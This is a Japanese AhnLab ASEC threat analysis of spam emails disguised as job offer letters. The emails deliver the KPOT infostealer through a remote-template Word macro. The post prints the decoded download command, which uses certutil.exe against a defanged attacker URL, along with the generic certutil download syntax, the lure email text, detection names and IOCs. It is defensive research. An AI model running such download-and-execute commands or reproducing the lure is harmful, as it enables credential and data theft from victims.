Posted By Hansoyoung , 2021年 August 6日

Job Offer Letter に偽装したマルウェア

ASEC 分析チームは最近、スパムメールに添付された Word ファイルによってインフォスティーラー型のマルウェア、KPOT を配布している状況を確認した。マクロを有効化すると最終的にインフォスティーラー型マルウェアをダウンロードする事例はこれまでにも多く存在したが、今回はユーザーを欺くために Job Offer Letter に偽装したスパムメールに、特定のパスワードがかけられた Word ファイルを利用している点がポイントだと言える。

スパムメールの正確な流入経路は把握されていないが、Job Offer Letter の内容を盛り込んでいる点と、受信者を区分して付与したかのようなパスワードをメール本文に記載していることから、ユーザーを騙すためにより巧妙な方法を用いたものと推定される。

送信者 : Team Lead
メール件名 : Our Team Job Invitation
メール本文 : Hello, our invitation is attached to this message. Your personal password: TBBEx○○○○○○○○○○UP3Vm

メール本文に記載されたパスワードを入力すると、圧縮ファイルが解凍される。OOXML(Office Open XML)フォーマットの正常な XML Relationship を利用して、Target アドレスのみに不正な URL を利用するため、ファイルのバイナリだけでは不正かどうかを判断することが難しい。以下の図3)のように settings.xml.rels ファイル内に不正なマクロとペイロードが含まれたリモートテンプレートをロードできる URL が存在するが、ユーザーが Word ファイルを開くだけでも外部の不正な URL に接続を試みる特徴を持っている。

図2) 暗号化圧縮された不正な Word ファイル。パスワードはメール本文に存在する。

DOTM ファイルには難読化されている不正なマクロコードが含まれている。マクロが実行されると、Windows の正常なプロセスである certutil.exe により KPOT マルウェアがダウンロードされ、以降 dll 形式のマルウェアを rundll32.exe で実行する。

certutil.exe は Windows で証明書を管理するときに使用する基本的なプログラムであるが、「certutil.exe -urlcache -split -f [URL] [output.file]」のような方式でリモート URL から証明書あるいは他のファイルをダウンロードしてローカルファイルとして保存できるため、このような方式でマルウェアの配布に使われることもある。

難読化されているマクロコードをデバッグした場合、以下のように外部 URL から dll ファイルを %TEMP% パスにダウンロードすることがわかる。ここでダウンロードされるファイルが、インフォスティーラー型マルウェアの KPOT である。

certutil.exe -urlcache -split -f hxxps://donattelli[.]com/test/ssi/1.dll C:\Users\[User]\AppData\Local\Temp\rad6FECC.tmp.dll

図5) マクロコードをデバッグすると確認できる DOCM ダウンロード URL および実行方法

図6) 子プロセスとして確認される certutil.exe & rundll32.exe

KPOT マルウェアはインターネットブラウザ、FTP クライアント、VPN クライアント、メッセンジャー、暗号通貨ウォレットからデータを盗むマルウェアである。当社の解析インフラ RAPIT によって WS_FTP / FileZilla / WinSCP の設定ファイルと Outlook アプリケーションのアカウント情報に対するアクセスの試みが確認されている。

以下の図8)からわかるように、コード上でもユーザーの PC 情報だけでなく、様々なアプリケーションの情報を奪取することが確認できる。

図7) 当社インフラ RAPIT で確認できる KPOT インフォスティーラーの不正な行為

スパムメールを通じて流入するマルウェアの割合が非常に高いため、ユーザーは出どころが不明なメールの添付ファイルを実行しないようにしなければならない。もちろん、信頼できる相手からメールを受信しても送信者のメールアドレスをもう一度確認すべきであり、同時に、基本的にはメール内の添付ファイルを開かないように注意を払う習慣が必要である。

また、使用しているアンチウイルスソフトのエンジンパターンのバージョンを常に最新版にアップデートして使用することを推奨する。

AhnLab V3 プロダクトラインでは、本文で紹介した不正なファイルに対して以下のように検知している。

[ファイル検知]
Downloader/DOC.Generic
Downloader/DOC.Agent
Infostealer/Win.KPot.C4565958

[IOC]
dc3f839b6f2a8c1833d9ae4e4f8dc4c6
23a471d956410bc80dc0cabc006252f6
1ea7d46d94299fa8bad4043c13100df0
hxxps://donattelli[.]com

関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。

Categories:マルウェアの情報

Tagged as:スパムメール,マクロマルウェア,マルウェア,Macro,MACRO MALICIOUS CODE,Macro Malware,malware,VBA Macro,word macro